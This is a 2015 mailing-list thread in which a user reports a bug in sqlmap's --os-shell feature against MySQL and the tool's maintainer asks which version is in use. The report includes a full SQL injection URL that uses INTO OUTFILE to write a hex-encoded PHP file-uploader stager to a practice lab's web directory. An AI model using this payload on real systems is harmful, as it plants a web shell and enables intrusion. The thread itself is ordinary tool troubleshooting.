Re: [sqlmap-users] SQLmap --os-shell BUG
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] SQLmap --os-shell BUG
|
From: Danux <da...@gm...> - 2015-07-04 22:41:40
|
Thanks sqlmap --version sqlmap/1.0-dev In the meantime I will patch procs/mysql/write_file_limit.sql On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm... > wrote: > Which revision/version of sqlmap do you use? There has been a related > patch a month ago. Will check tomorrow. > > Bye > > On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote: > >> Hello list, there is an issue with sqlmap when using the --os-shell >> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian) >> >> Description: >> >> A specific PAYLOAD (see below) used to upload a web shell will create an >> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD >> attempt will fail with an "already exist" error and therefore not able >> to upload the web shell. >> >> >> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+ >> >> By default, MySQL will throw an error if the file already exists: >> >> mysql> select 'ss' into outfile >> '/var/www/OwaspPractice/upload/tmpbezff.php'; >> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' >> already exists >> >> Solution: >> >> 1. Change the web shell name for every new PAYLOAD attempt, at least when >> using the -os-shell option >> 2. Fix the PAYLOAD causing problems. >> >> -- >> DanUx >> >> >> ------------------------------------------------------------------------------ >> Don't Limit Your Business. Reach for the Cloud. >> GigeNET's Cloud Solutions provide you with the tools and support that >> you need to offload your IT needs and focus on growing your business. >> Configured For All Businesses. Start Your Cloud Today. >> https://www.gigenetcloud.com/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- DanUx |
